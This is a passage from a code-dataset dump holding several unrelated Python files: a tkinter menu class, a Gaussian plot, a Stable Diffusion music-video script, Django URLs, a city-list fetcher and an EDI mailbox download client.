__init__(self,master,root,*args,**kwargs):\n self.states = {}\n super(Menu,self).__init__(master,*args,**kwargs)\n\n self.hotkeys = Hotkeys(root)\n self.index = 0\n \n def add_command(self,label,*args,**kwargs):\n hotkey = kwargs.pop('hotkey',None)\n command = kwargs.get('command', None)\n bind = kwargs.pop('bind',True)\n\n if hotkey is not None 
and command is not None:\n if bind: self.hotkeys.bind(hotkey, command)\n kwargs['accelerator'] = hotkeys_to_string(hotkey).replace(\"(\",\"\").replace(\")\",\"\")\n \n state = kwargs.get('state','normal')\n kwargs['state'] = state\n \n if kwargs.pop('can_disable', True):\n self.states[label] = {'state':state, 'hotkey':hotkey}\n if state == 'disabled' and hotkey is not None:\n if self.hotkeys.is_bound(hotkey): self.hotkeys.disable(hotkey)\n\n kwargs['label'] = label\n super(Menu,self).add_command(*args,**kwargs)\n self.index += 1\n\n def add_checkbutton(self, label, *args, **kwargs):\n hotkey = kwargs.pop('hotkey',None)\n command = kwargs.get('command', None)\n bind = kwargs.pop('bind',True)\n\n if hotkey is not None and command is not None:\n if bind: self.hotkeys.bind(hotkey, command)\n kwargs['accelerator'] = hotkeys_to_string(hotkey).replace(\"(\",\"\").replace(\")\",\"\")\n \n state = kwargs.get('state','normal')\n kwargs['state'] = state\n \n if kwargs.pop('can_disable', True):\n self.states[label] = {'state':state, 'hotkey':hotkey}\n if state == 'disabled' and hotkey is not None:\n if self.hotkeys.is_bound(hotkey): self.hotkeys.disable(hotkey)\n\n kwargs['label'] = label\n super(Menu,self).add_checkbutton(*args,**kwargs)\n self.index += 1\n\n def insert_separator(self):\n super(Menu,self).insert_separator(self.index)\n self.index += 1\n\n def set_state(self, state, label=None):\n if label is None:\n for l, s in self.states.items():\n self.states[l]['state'] = state\n self.entryconfig(l,state=state)\n if s['hotkey'] is not None and self.hotkeys.is_bound(s['hotkey']):\n if state == 'disabled': self.hotkeys.disable(s['hotkey'])\n elif state == 'normal' : self.hotkeys.enable(s['hotkey'])\n else:\n self.states[label]['state'] = state\n self.entryconfig(label,state=state)\n if self.states[label]['hotkey'] is not None and self.hotkeys.is_bound(s['hotkey']):\n if state == 'disabled': self.hotkeys.disable(self.states[label]['hotkey'])\n elif state == 'normal' : self.hotkeys.enable(self.states[label]['hotkey'])\n \n\n def disable(self,event=None,label=None):\n self.set_state('disabled',label=label)\n\n def enable(self,event=None,label=None):\n self.set_state('normal',label=label)\n \n", "repo_name": "hatfullr/pysplash", "sub_path": "gui/menubar/menu.py", "file_name": "menu.py", "file_ext": "py", "file_size_in_byte": 3300, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.version_info.major", "line_number": 2, "usage_type": "attribute"}, {"api_name": "sys.version_info", "line_number": 2, "usage_type": "name"}, {"api_name": "Tkinter.Menu", "line_number": 9, "usage_type": "attribute"}, {"api_name": "lib.hotkeys.Hotkeys", "line_number": 14, "usage_type": "call"}, {"api_name": "functions.hotkeystostring.hotkeys_to_string", "line_number": 24, "usage_type": "call"}, {"api_name": "functions.hotkeystostring.hotkeys_to_string", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "33658806611", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import multivariate_normal\n\n# 定義參數\nmu = np.array([2, 3]) # 平均值\ncov_matrix = np.array([[1, 0.5], [0.5, 2]]) # 協方差矩陣\n\n# 建立網格\nx, y = np.meshgrid(np.linspace(-5, 8, 100), np.linspace(-5, 8, 100))\npos = np.dstack((x, y))\n\n# 計算高斯分布\nrv = multivariate_normal(mu, cov_matrix)\nz = rv.pdf(pos)\n\n# 繪製等高線圖\nplt.contourf(x, y, z, cmap='viridis')\nplt.xlabel('X')\nplt.ylabel('Y')\nplt.title('2D Gaussian Distribution')\nplt.colorbar()\nplt.show()\n", 
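# Illustrative sketch (not part of the dataset record above): the tkinter
# Menu subclass it annotates pairs each entry's 'accelerator' label with a
# real hotkey binding. Tk only *displays* the accelerator string, so the
# separate bind() call is what actually triggers the command.
import tkinter as tk

root = tk.Tk()

def on_save(event=None):
    print("save triggered")

menubar = tk.Menu(root)
filemenu = tk.Menu(menubar, tearoff=0)
filemenu.add_command(label="Save", command=on_save, accelerator="Ctrl+S")
menubar.add_cascade(label="File", menu=filemenu)
root.config(menu=menubar)
root.bind("<Control-s>", on_save)  # without this, the accelerator is cosmetic
root.mainloop()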
"repo_name": "evan20010126/Deep_learning", "sub_path": "two_dimensional_gaussian.py", "file_name": "two_dimensional_gaussian.py", "file_ext": "py", "file_size_in_byte": 557, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.array", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.dstack", "line_number": 11, "usage_type": "call"}, {"api_name": "scipy.stats.multivariate_normal", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.contourf", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "75363124324", "text": "import datetime\nimport time\nimport ffmpeg\nimport glob\nimport webvtt\nimport copy\nimport random\nimport sys\nimport traceback\nimport shlex\nimport os\nfrom PIL import Image\nfrom typing import List\nfrom scripts.Transcriber import Transcriber\nfrom scripts.WhisperTranscriber import WhisperTranscriber\nfrom scripts.VideoGenerator import VideoGenerator\nfrom scripts.BasicVideoGenerator import BasicVideoGenerator\nfrom scripts.GPTImageDescriber import GPTImageDescriber\nfrom scripts.PromptRefiner import PromptRefiner\nfrom scripts.YoutubeDownloader import YoutubeDownloader\n\n\nimport modules.scripts as scripts\nimport gradio as gr\n\nfrom modules import sd_samplers\nfrom modules.processing import Processed, process_images\nfrom modules.shared import state\n\nBASE_PATH = f\"{scripts.basedir()}\"\nprint(f\"BASE PATH: {BASE_PATH}\")\n\n# Set the used transcriber!\ntranscriber: Transcriber = WhisperTranscriber(BASE_PATH)\ngenerator: VideoGenerator = BasicVideoGenerator()\n\n# Create the processing stack\nprocessing_stack: List[PromptRefiner] = []\nprocessing_stack.append(GPTImageDescriber())\n\nyt_scraper: YoutubeDownloader = YoutubeDownloader()\n\ndef process_string_tag(tag):\n return tag\n\ndef process_int_tag(tag):\n return int(tag)\n\ndef process_float_tag(tag):\n return float(tag)\n\ndef process_boolean_tag(tag):\n return True if (tag == \"true\") else False\n\ndef get_captions_from_file():\n text_files = glob.glob(BASE_PATH+\"/temp/*.txt\", recursive=False)\n if(len(text_files)!=1):\n raise Exception(f\"Found {len(text_files)} txt file(s) in {BASE_PATH}/temp/*.txt, expected 1\")\n with open(text_files[0], encoding=\"utf8\") as f:\n lines = f.readlines()\n return \" \".join(lines)\n\nprompt_tags = {\n \"sd_model\": None,\n \"outpath_samples\": process_string_tag,\n \"outpath_grids\": 
process_string_tag,\n \"prompt_for_display\": process_string_tag,\n \"prompt\": process_string_tag,\n \"negative_prompt\": process_string_tag,\n \"styles\": process_string_tag,\n \"seed\": process_int_tag,\n \"subseed_strength\": process_float_tag,\n \"subseed\": process_int_tag,\n \"seed_resize_from_h\": process_int_tag,\n \"seed_resize_from_w\": process_int_tag,\n \"sampler_index\": process_int_tag,\n \"sampler_name\": process_string_tag,\n \"batch_size\": process_int_tag,\n \"n_iter\": process_int_tag,\n \"steps\": process_int_tag,\n \"cfg_scale\": process_float_tag,\n \"width\": process_int_tag,\n \"height\": process_int_tag,\n \"restore_faces\": process_boolean_tag,\n \"tiling\": process_boolean_tag,\n \"do_not_save_samples\": process_boolean_tag,\n \"do_not_save_grid\": process_boolean_tag\n}\n\ndef wipe_directory(directory_path: str):\n # Check if the directory exists\n if not os.path.isdir(directory_path):\n print(f\"Directory '{directory_path}' does not exist.\")\n return\n \n def is_important_file(path):\n importaint_files = ['.py', '.mov', '.mp4', '.exe', '.dll']\n _, extension = os.path.splitext(path)\n return extension in importaint_files\n \n # Iterate over all files in the directory\n for filename in os.listdir(directory_path):\n file_path = os.path.join(directory_path, filename)\n \n # Do not remove important files\n if(is_important_file(file_path)):\n continue\n\n # Check if the current path is a file\n if os.path.isfile(file_path):\n try:\n os.remove(file_path)\n print(f\"Successfully removed file: {file_path}\")\n except Exception as e:\n print(f\"Error occurred while removing file: {file_path}\")\n print(f\"Error message: {str(e)}\")\n\n\nclass Script(scripts.Script):\n def title(self):\n return \"Generates a music video from a song file\"\n\n def transcribe_and_update(self, audio: str, translate: bool, prompt_txt):\n transcriber.transcribe_audio_file(audio, translate)\n return get_captions_from_file()\n \n\n def ui(self, is_img2img):\n \n def update_value(url):\n self.yt_url = url\n return url\n def scrape_video():\n try:\n self.yt_url\n except:\n raise Exception(f\"No youtube video selected!\")\n print(f\"URL: {self.yt_url}\")\n yt_scraper.download_all(self.yt_url, f\"{BASE_PATH}/temp\")\n return get_captions_from_file()\n\n yt_video_input: gr.Textbox = gr.Textbox(label=\"Get audio and subtitles from a youtube video\", lines = 1, elem_id=self.elem_id(\"yt_video_url\"))\n\n with gr.Row(variant=\"compact\", elem_id=\"apply_button_row\"):\n yt_video_apply_btn = gr.Button(value=\"Get audio and captions from yt video\", elem_id=\"run_crawler_btn\")\n \n \n\n checkbox_gpt_refinement = gr.Checkbox(label=\"Let gpt refine the prompts\", value=True, elem_id=self.elem_id(\"checkbox_gpt_refinement\"))\n checkbox_translate = gr.Checkbox(label=\"Translate lyrics to english\", value=False, elem_id=self.elem_id(\"checkbox_translate\"))\n audio = gr.File(label=\"Audio file\", type='binary', elem_id=self.elem_id(\"audio_file\"))\n prompt_txt = gr.Textbox(label=\"Lyrics used for generation\", lines=1, elem_id=self.elem_id(\"prompt_txt\"))\n gpt_context_txt = gr.Textbox(label=\"Additional gpt context for image generation\", lines=4, elem_id=self.elem_id(\"gpt_context_txt\"))\n \n \n yt_video_apply_btn.click(scrape_video, inputs=[], outputs=[prompt_txt])\n audio.change(fn=self.transcribe_and_update, inputs=[audio, checkbox_translate, prompt_txt], outputs=[prompt_txt], show_progress=False)\n \n prompt_txt.change(lambda tb: gr.update(lines=7) if (\"\\n\" in tb) else gr.update(lines=2), 
inputs=[prompt_txt], outputs=[prompt_txt], show_progress=False)\n gpt_context_txt.change(lambda tb: gr.update(lines=7) if (\"\\n\" in tb) else gr.update(lines=4), inputs=[gpt_context_txt], outputs=[gpt_context_txt], show_progress=False)\n \n yt_video_input.change(lambda tb: update_value(str(tb)), inputs=[yt_video_input], outputs=[yt_video_input], show_progress=False)\n return [prompt_txt, checkbox_gpt_refinement, checkbox_translate, yt_video_input, gpt_context_txt]\n\n def run(self, p, prompt_txt: str, checkbox_gpt_refinement, checkbox_translate, yt_video_input, gpt_context_txt):\n options = {\n 'checkbox_gpt_refinement': checkbox_gpt_refinement,\n 'gpt_context': gpt_context_txt\n }\n \n print(f\"GENERATING USING THE TEXT PROMPT: \\n{p.prompt}\\n\\n and description: {prompt_txt}\")\n print(f\"And additional context: {gpt_context_txt}\")\n abc = prompt_tags.get(\"negative_prompt\")\n print(f\"PROMPT: {abc}\")\n lines = [x.strip() for x in prompt_txt.splitlines()]\n lines = [x for x in lines if len(x) > 0]\n \n # Convert the lyrics into images by running them through\n # a number of refiners\n try:\n for refiner in processing_stack:\n lines = refiner.refine(lines, options)\n # TODO Insert p.prompt in the beginning of all lines.\n for i in range(len(lines)):\n lines[i] = f\"{p.prompt}, {lines[i]}\" \n except Exception as e:\n print(\"Failed to refine the pompts: \" + str(e))\n raise\n\n p.do_not_save_grid = True\n\n job_count = 0\n jobs = []\n\n for line in lines:\n \n args = {\"prompt\": line}\n\n job_count += args.get(\"n_iter\", p.n_iter)\n\n jobs.append(args)\n\n print(f\"Will process {len(lines)} images in {job_count} jobs.\")\n\n state.job_count = job_count\n\n images = []\n all_prompts = []\n infotexts = []\n for args in jobs:\n state.job = f\"{state.job_no + 1} out of {state.job_count}\"\n\n copy_p = copy.copy(p)\n for k, v in args.items():\n setattr(copy_p, k, v)\n\n proc = process_images(copy_p)\n images += proc.images\n\n all_prompts += proc.all_prompts\n infotexts += proc.infotexts\n\n # Save images in a temp foler\n print(f\"SAVING {len(images)} images in temp folder\")\n i = 0\n for elm in images:\n img: Image = elm\n file_path = f\"{BASE_PATH}/temp/{str(i).zfill(5)}.png\"\n img.save(file_path)\n i+=1\n\n # GENERATE THE VIDEO\n try:\n temp_folder:str = f\"{BASE_PATH}/temp\"\n generator.generate_video(temp_folder)\n wipe_directory(temp_folder)\n \n except Exception as e:\n print(\"Failed to generate the video: \", str(e))\n return Processed(p, images, p.seed, \"\", all_prompts=all_prompts, infotexts=infotexts)\n\n", "repo_name": "pad918/stable-diffusion-mv-generator", "sub_path": "scripts/Main.py", "file_name": "Main.py", "file_ext": "py", "file_size_in_byte": 8791, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "modules.scripts.basedir", "line_number": 30, "usage_type": "call"}, {"api_name": "modules.scripts", "line_number": 30, "usage_type": "name"}, {"api_name": "scripts.Transcriber.Transcriber", "line_number": 34, "usage_type": "name"}, {"api_name": "scripts.WhisperTranscriber.WhisperTranscriber", "line_number": 34, "usage_type": "call"}, {"api_name": "scripts.VideoGenerator.VideoGenerator", "line_number": 35, "usage_type": "name"}, {"api_name": "scripts.BasicVideoGenerator.BasicVideoGenerator", "line_number": 35, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 38, "usage_type": "name"}, {"api_name": "scripts.PromptRefiner.PromptRefiner", "line_number": 38, "usage_type": 
"name"}, {"api_name": "scripts.GPTImageDescriber.GPTImageDescriber", "line_number": 39, "usage_type": "call"}, {"api_name": "scripts.YoutubeDownloader.YoutubeDownloader", "line_number": 41, "usage_type": "name"}, {"api_name": "glob.glob", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 92, "usage_type": "call"}, {"api_name": "os.path", "line_number": 92, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 98, "usage_type": "call"}, {"api_name": "os.path", "line_number": 98, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path", "line_number": 103, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path", "line_number": 110, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 112, "usage_type": "call"}, {"api_name": "modules.scripts.Script", "line_number": 119, "usage_type": "attribute"}, {"api_name": "modules.scripts", "line_number": 119, "usage_type": "name"}, {"api_name": "gradio.Textbox", "line_number": 142, "usage_type": "attribute"}, {"api_name": "gradio.Row", "line_number": 144, "usage_type": "call"}, {"api_name": "gradio.Button", "line_number": 145, "usage_type": "call"}, {"api_name": "gradio.Checkbox", "line_number": 149, "usage_type": "call"}, {"api_name": "gradio.Checkbox", "line_number": 150, "usage_type": "call"}, {"api_name": "gradio.File", "line_number": 151, "usage_type": "call"}, {"api_name": "gradio.Textbox", "line_number": 152, "usage_type": "call"}, {"api_name": "gradio.Textbox", "line_number": 153, "usage_type": "call"}, {"api_name": "gradio.update", "line_number": 159, "usage_type": "call"}, {"api_name": "gradio.update", "line_number": 160, "usage_type": "call"}, {"api_name": "modules.shared.state.job_count", "line_number": 205, "usage_type": "attribute"}, {"api_name": "modules.shared.state", "line_number": 205, "usage_type": "name"}, {"api_name": "modules.shared.state.job", "line_number": 211, "usage_type": "attribute"}, {"api_name": "modules.shared.state", "line_number": 211, "usage_type": "name"}, {"api_name": "modules.shared.state.job_no", "line_number": 211, "usage_type": "attribute"}, {"api_name": "modules.shared.state.job_count", "line_number": 211, "usage_type": "attribute"}, {"api_name": "copy.copy", "line_number": 213, "usage_type": "call"}, {"api_name": "modules.processing.process_images", "line_number": 217, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 227, "usage_type": "name"}, {"api_name": "modules.processing.Processed", "line_number": 240, "usage_type": "call"}]} +{"seq_id": "10595790242", "text": "from rest_framework import routers\nfrom django.conf.urls import url, include\nfrom . 
import views\n\nrouter = routers.DefaultRouter()\nrouter.register(r'CarMake', views.MakeView)\nrouter.register(r'CarModel', views.ModelView)\n# router.register(r'Review', views.ReviewView)\nrouter.register(r'User', views.UserView)\n\nurlpatterns = [\n url(r'^login$', views.login_user, name='login'),\n url(r'^register$', views.register_user, name='register'),\n url(r'^', include(router.urls)),\n url(r'api-auth/', include('rest_framework.urls'))\n]\n", "repo_name": "DamonRomano/backEndCapstone", "sub_path": "car_sort_project/server/car_sort_app/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 534, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.routers.DefaultRouter", "line_number": 5, "usage_type": "call"}, {"api_name": "rest_framework.routers", "line_number": 5, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.include", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "36764252808", "text": "# encoding: utf-8\nimport logging\nfrom config.config import config\nfrom utils.client import get_data\nfrom models.orm import Session\nfrom models.city import City\n\ndef get_city_list():\n \"\"\"\n 获取城市列表\n \"\"\"\n url = 'http://app.api.lianjia.com/config/config/initData'\n\n payload = {\n 'params': '{{\"city_id\": {}, \"mobile_type\": \"android\", \"version\": \"8.0.1\"}}'.format('110000'),\n 'fields': '{ \"city_config_all\": \"\"}'\n }\n logging.info('开始更新城市列表')\n data = get_data(url, payload, method='POST')\n db_session = Session()\n for a_city in data['city_config_all']['list']:\n city = City(a_city)\n db_session.merge(city)\n db_session.commit()\n db_session.close()\n logging.info('城市列表更新完成,数据表名称:{}'.format(City.__tablename__))\n\ndef main():\n get_city_list()\n\n\nif __name__ == '__main__':\n main()", "repo_name": "yinghuochong/BestHouse", "sub_path": "get_cities.py", "file_name": "get_cities.py", "file_ext": "py", "file_size_in_byte": 896, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.info", "line_number": 18, "usage_type": "call"}, {"api_name": "utils.client.get_data", "line_number": 19, "usage_type": "call"}, {"api_name": "models.orm.Session", "line_number": 20, "usage_type": "call"}, {"api_name": "models.city.City", "line_number": 22, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 26, "usage_type": "call"}, {"api_name": "models.city.City.__tablename__", "line_number": 26, "usage_type": "attribute"}, {"api_name": "models.city.City", "line_number": 26, "usage_type": "name"}]} +{"seq_id": "8809495654", "text": "import json\nimport urllib\nimport aiohttp\nimport urllib3\nimport requests\nimport os\nfrom termcolor import colored\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime, timedelta\nfrom shareplum import Office365\nfrom shareplum import Site\nfrom shareplum.site import Version\n\nclass LogActivity:\n def __init__(self, name='CK', subject=None, status='Active', message=None):\n d = datetime.now().strftime('%Y%m%d')\n path = f\"LOGS/{d}\"\n if 
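# Illustrative sketch (not part of the dataset record above): the city-list
# fetcher it annotates upserts rows with db_session.merge(). Its Session
# comes from a local models.orm module; assuming that wraps SQLAlchemy
# (1.4+), merge() looks the object up by primary key and either updates the
# existing row or inserts a new one, as shown here with a toy model.
from sqlalchemy import create_engine, Column, Integer, String
from sqlalchemy.orm import declarative_base, Session

Base = declarative_base()

class City(Base):
    __tablename__ = "city"
    id = Column(Integer, primary_key=True)
    name = Column(String)

engine = create_engine("sqlite://")  # in-memory DB for the demo
Base.metadata.create_all(engine)

with Session(engine) as session:
    session.merge(City(id=110000, name="Beijing"))
    session.merge(City(id=110000, name="Beijing (updated)"))  # same PK: update
    session.commit()
    print(session.get(City, 110000).name)  # -> Beijing (updated)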
os.path.exists(path) is False:os.makedirs(path)\n filename = f\"{path}/{name}-{d}.log\"\n f = open(filename, 'a+')\n txt = f\"{str(datetime.now().strftime('%Y%m%d %H:%M:%S')).ljust(25)}SUBJECT: {str(subject).ljust(20)}STATUS: {str(status).ljust(10)}MESSAGE: {str(message).ljust(50)}\"\n f.write(f\"{txt}\\n\")\n f.close()\n\nclass SplSharePoint:\n def __init__(self, url, site, username, password):\n self.url = url\n self.site = site\n self.username = username\n self.password = password\n \n def upload(self, pathname, filename, destination=\"Temp\"):\n try:\n authcookie = Office365(self.url, username=self.username, password=self.password).GetCookies()\n site = Site(f'{self.url}/sites/{self.site}', version=Version.v365, authcookie=authcookie);\n folder = site.Folder(f'Shared Documents/{destination}')\n with open(pathname, mode='rb') as file:\n fileContent = file.read()\n \n folder.upload_file(fileContent, filename)\n LogActivity(name=\"SPL\", subject=\"SHAREPOINT\", status=\"Success\", message=f\"Backup GEDI({filename})\")\n \n except Exception as e:\n LogActivity(name=\"SPL\", subject=\"SHAREPOINT\", status=\"Error\", message=str(e))\n pass\n\nclass ObjectLink:\n def __init__(\n self,\n host,\n objtype,\n mailbox,\n batchid,\n size,\n batchfile,\n currentdate,\n flags,\n formats,\n orgname,\n download=False,\n pathname=\"EXPORT\"\n ):\n # import os\n from datetime import datetime\n\n ordn = None\n bf = 0\n filetype = \"RECEIVE\"\n factory = \"INJ\"\n\n if objtype == \"RMW\":\n ordn = str(batchfile).strip()\n factory = \"RMW\"\n filename = \"\"\n if ordn[:3] == \"OES\":\n filename = ordn[len(\"OES.32TE.SPL.\"):]\n else:\n filename = ordn[len(\"NRRIS.32TE.SPL.\"):]\n\n filename = filename[: filename.find(\".\")].upper()\n if filename == \"ISSUELIST\":\n filetype = \"CONLOT\"\n\n elif filename == \"ISSUENO\":\n filetype = \"KANBAN\"\n\n else:\n filetype = \"RECEIVE\"\n\n elif objtype == \"CK2\":\n ordn = str(batchfile[: len(\"OES.VCBI\")]).strip()\n bf = int(str(batchfile[len(\"OES.VCBI\") + 3:])[1:2].strip())\n filetype = \"RECEIVE\"\n if ordn == \"OES.VCBI\":\n filetype = \"ORDERPLAN\"\n\n factory = \"INJ\"\n if bf == 4:\n factory = \"AW\"\n\n elif objtype == \"J03\":\n print(\"J03\")\n\n elif objtype == \"FG\":\n print(\"FG\")\n\n else:\n print(\"UNKNOW\")\n\n self.objtype = objtype\n self.mailbox = mailbox\n self.batchid = batchid\n self.size = size\n self.batchfile = batchfile\n self.currentdate = datetime.strptime(currentdate, \"%b %d, %Y %I:%M %p\")\n self.flags = flags\n self.formats = formats\n self.orgname = orgname\n self.factory = factory\n self.filetype = filetype\n self.download = download\n self.destination = f'{pathname}/{filetype}/{(self.currentdate).strftime(\"%Y%m%d\")}'\n self.linkfile = f\"{host}/cehttp/servlet/MailboxServlet?operation=DOWNLOAD&mailbox_id={self.mailbox}&batch_num={self.batchid}&data_format=A&batch_id={self.batchfile}\"\n\n\nclass Yazaki:\n def __init__(self, service_type=\"CK2\", host=\"https://218.225.124.157:9443\", username=None, password=None):\n self.service_type = service_type\n self.host = host\n self.username = username\n self.password = password\n\n # @staticmethod\n def login(self):\n response = False\n try:\n # login yazaki website.\n url = f\"{self.host}/cehttp/servlet/MailboxServlet\"\n passwd = urllib.parse.quote(self.password)\n payload = (\n f\"operation=LOGON&remote={self.username}&password={passwd}\"\n )\n headers = {\"Content-Type\": \"application/x-www-form-urlencoded\"}\n urllib3.disable_warnings()\n response = requests.request(\n 
\"POST\", url, headers=headers, verify=False, data=payload, timeout=3)\n\n txt = None\n docs = BeautifulSoup(response.text, \"html.parser\")\n for i in docs.find_all(\"hr\"):\n txt = (i.previous).replace(\"\\n\", \"\")\n\n _txt_status = \"Success\"\n if txt.find(\"751\") >= 0:\n _txt_status = \"Error\"\n response = False\n\n LogActivity(subject=\"LOGIN\", status=_txt_status, message=str(txt))\n\n except Exception as msg:\n LogActivity(subject=\"LOGIN\", status='Error', message=str(msg))\n pass\n\n return response\n\n def logout(self, session):\n response = True\n try:\n url = f\"{self.host}/cehttp/servlet/MailboxServlet?operation=LOGOFF\"\n headers = {}\n payload = {}\n rq = requests.request(\n \"POST\",\n url,\n data=payload,\n headers=headers,\n verify=False,\n timeout=3,\n cookies=session.cookies,\n )\n\n docs = BeautifulSoup(rq.text, \"html.parser\")\n for i in docs.find_all(\"hr\"):\n txt = (i.previous).replace(\"\\n\", \"\")\n\n _txt_status = \"Success\"\n if txt.find(\"751\") >= 0:\n _txt_status = \"Error\"\n response = False\n\n LogActivity(subject=\"LOGOUT\", status=_txt_status, message=str(txt))\n\n except Exception as txt:\n LogActivity(subject=\"LOGOUT\", status='Error', message=str(txt))\n pass\n\n return response\n\n def get_link(self, session):\n obj = []\n try:\n etd = str((datetime.now() - timedelta(days=1)).strftime(\"%Y%m%d\"))\n # etd = '20220501'\n # get cookies after login.\n if session.status_code == 200:\n # get html page\n url = f\"{self.host}/cehttp/servlet/MailboxServlet\"\n headers = {\"Content-Type\": \"application/x-www-form-urlencoded\"}\n payload = f\"operation=DIRECTORY&fromdate={etd}&Submit=Receive\"\n r = requests.request(\n \"POST\",\n url,\n data=payload,\n headers=headers,\n verify=False,\n timeout=3,\n cookies=session.cookies,\n )\n # print(type(r))\n soup = BeautifulSoup(r.text, \"html.parser\")\n for tr in soup.find_all(\"tr\"):\n found = False\n i = 0\n docs = []\n for td in tr.find_all(\"td\"):\n txt = (td.text).rstrip().lstrip()\n docs.append(txt)\n if td.find(\"a\") != None:\n found = True\n\n if found is True: # False =debug,True=prod.\n if len(docs) >= 9:\n # if str(docs[3])[: len(\"OES.VCBI.32T5\")] == \"OES.VCBI.32T5\":\n # print(docs[3])\n \n l = ObjectLink(\n self.host,\n self.service_type,\n docs[0],\n docs[1],\n str(docs[2]).replace(\",\", \"\").strip(),\n docs[3],\n f\"{docs[4]} {docs[5]}\",\n docs[6],\n docs[7],\n docs[8],\n found,\n )\n obj.append(l)\n\n i += 1\n\n print(colored(f\"found new link => {len(obj)}\", \"green\"))\n LogActivity(subject=\"GET LINK\", status='Success',\n message=f\"FOUND NEW LINK({len(obj)})\")\n\n except Exception as ex:\n LogActivity(subject=\"GET LINK\", status='Error', message=str(ex))\n pass\n\n return obj\n \n def spec_download_gedi_files(self, session, obj):\n filename = f\"{obj['destination']}/{obj['batchid']}.{obj['batchfile']}\"\n try:\n # print(obj)\n # makedir folder gedi is exits\n os.makedirs(obj['destination'], exist_ok=True)\n # download file\n request = requests.get(\n obj['linkfile'],\n stream=True,\n verify=False,\n cookies=session.cookies,\n allow_redirects=True,\n )\n docs = BeautifulSoup(request.content, \"lxml\")\n\n # Write data to GEDI File\n f = open(filename, mode=\"a\", encoding=\"ascii\", newline=\"\\r\\n\")\n for p in docs:\n f.write(p.text)\n f.close()\n\n LogActivity(subject=\"DOWNLOAD\", status='Success',\n message=f\"Download GEDI FILE({obj['batchfile']})\")\n\n except Exception as ex:\n LogActivity(subject=\"DOWNLOAD\", status='Error', message=str(ex))\n filename = None\n 
pass\n return filename\n\n def download_gedi_files(self, session, obj):\n filename = f\"{obj.destination}/{obj.batchid}.{obj.batchfile}\"\n try:\n # print(obj)\n # makedir folder gedi is exits\n os.makedirs(obj.destination, exist_ok=True)\n # download file\n request = requests.get(\n obj.linkfile,\n stream=True,\n verify=False,\n cookies=session.cookies,\n allow_redirects=True,\n )\n docs = BeautifulSoup(request.content, \"lxml\")\n\n # Write data to GEDI File\n f = open(filename, mode=\"a\", encoding=\"ascii\", newline=\"\\r\\n\")\n for p in docs:\n f.write(p.text)\n f.close()\n\n LogActivity(subject=\"DOWNLOAD\", status='Success',\n message=f\"Download GEDI FILE({obj.batchfile})\")\n\n except Exception as ex:\n LogActivity(subject=\"DOWNLOAD\", status='Error', message=str(ex))\n filename = None\n pass\n return filename\n\n\nclass SplApi:\n def __init__(self, host=\"http://localhost:8080\", username=\"admin\", password=\"admin@spl\"):\n self.host = host\n self.username = username\n self.password = urllib.parse.quote(password)\n \n def __trim_txt(self, txt):\n return str(txt).lstrip().rstrip()\n \n def __check_partname(self, fac, part):\n p = str(part).lstrip().rstrip().replace(\".\", \"\")\n partname = p\n if fac == \"AW\":\n try:\n k = str(p[: p.index(\" \")]).strip()\n s = p[len(k) :]\n ss = s.strip()\n sn = str(ss[: ss.index(\" \")]).strip()\n ssize = str(ss[: ss.index(\" \")])\n\n if len(sn) > 1:\n ssize = str(f\"{sn[:1]}.{sn[1:]}\").strip()\n\n c = str(p[(len(k) + len(ssize)) + 1 :]).strip()\n partname = f\"{k} {ssize} {c}\"\n except:\n pass\n finally:\n pass\n\n return partname\n\n def __re_partname(self, txt):\n return (str(txt).replace(\"b\", 